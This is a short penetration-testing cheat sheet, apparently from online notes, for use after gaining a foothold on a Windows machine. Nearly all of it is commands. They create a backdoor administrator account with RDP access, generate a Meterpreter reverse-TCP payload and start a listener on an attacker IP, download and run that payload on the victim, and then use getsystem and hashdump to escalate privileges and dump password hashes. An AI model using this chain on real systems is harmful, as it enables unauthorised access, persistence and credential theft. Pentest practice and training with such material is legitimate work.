Add RDP Account & Ride on Meterpreter
with initial foothold
Remote Desktop
net user pentest Pen.TE$t2024!1 /ADD
net localgroup "Remote Desktop Users" pentest /add
net localgroup "Administrators" pentest /add
Meterpreter
Payload generation
https://www.offsec.com/metasploit-unleashed/generating-payloads/
use payload/windows/meterpreter/reverse_tcp
set lhost=10.9.254.6
set lport=8888
generate -f exe -o /var/www/html/meterpreter.exe
Metasploit listener for meterpreter payload
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.9.254.6
set lport 8888
run
Transfer meterpreter.exe
apache2ctl start
Connect via RDP to the victim and start powershell
$URL="http://10.9.254.6/meterpreter.exe"
$Path="C:\Users\pentest\meterpreter.exe"
Invoke-WebRequest -URI $URL -OutFile $Path
Run meterpreter.exe
Start meterpreter.exe "As Administrator"

Getsystem & hashdump
meterpreter> getsystem
meterpreter> hashdump

Last updated
Was this helpful?